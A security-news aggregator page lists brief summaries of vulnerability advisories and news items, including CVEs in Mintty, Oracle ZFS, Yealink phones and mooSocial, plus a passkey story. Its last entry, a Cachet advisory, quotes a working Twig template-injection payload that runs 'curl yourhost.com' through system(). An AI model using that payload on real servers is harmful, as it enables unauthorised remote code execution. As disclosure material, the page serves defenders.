Security
Headlines
HeadlinesLatestCVEs

Tag

#apple

CVE-2022-47583: ""?! ANSI Terminal security in 2023 and finding 10 CVEs

Terminal character injection in Mintty before 3.6.3 allows code execution via unescaped output to the terminal.

CVE
Open in Source
#xss#vulnerability#web#mac#windows#apple#linux#debian#red_hat#dos#git#kubernetes#rce#perl#pdf#buffer_overflow#auth#ssh#ssl
Open Source Security Agents Promise Greater Simplicity, Flexibility

Endpoint management based on open source agents, such as osquery, could simplify IT management and security while giving larger firms more customization options.

CVE-2023-22130: Oracle Critical Patch Update Advisory - October 2023

Vulnerability in the Sun ZFS Storage Appliance product of Oracle Systems (component: Core). The supported version that is affected is 8.8.60. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Sun ZFS Storage Appliance. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Sun ZFS Storage Appliance. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).

Amazon Quietly Wades Into the Passkey Waters

The move by the e-commerce kahuna to offer advanced authentication to its 300+ million users has the potential to move the needle on the technology's adoption, security experts say.

Apple Security Advisory 10-10-2023-1

Apple Security Advisory 10-10-2023-1 - iOS 16.7.1 and iPadOS 16.7.1 addresses buffer overflow and code execution vulnerabilities.

CVE-2023-43959: OffSec’s Exploit Database Archive

An issue in YeaLinkSIP-T19P-E2 v.53.84.0.15 allows a remote privileged attacker to execute arbitrary code via a crafted request the ping function of the diagnostic component.

CVE-2023-45542: GitHub - ahrixia/CVE-2023-45542: mooSocial v3.1.8 is vulnerable to cross-site scripting on search function.

Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.

Zoo Management System 1.0 Shell Upload

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

2023 Mount Carmel School 6.4.1 Cross Site Scripting

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

GHSA-hv79-p62r-wg3p: Cachet vulnerable to Authenticated Remote Code Execution

### Summary A template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Within `/cachet/app/Http/Routes/ApiRoutes.php`, and attacker could control `template` input which is passed to `laravel's` dispatched handler `/cachet/app/Bus/Handlers/Commands/Incident/CreateIncidentCommandHandler.php`. If an attacker is able to control this data, they may be able to trigger a server-side template injection vulnerability which can lead to remote code execution. This vulnerability does not exist within the [Twig](https://twig.symfony.com/) library itself, but exists during the process of the [Cachet](https://github.com/cachethq/cachet) processing of the data without any filtration. This has been patched in Cachet version 2.4. ### PoC 1. Log in as a default user (non-admin); 2. Create an incident with name `slug1` and with content: `{{ ['curl yourhost.com','']|sort('system') }}` or with any other ...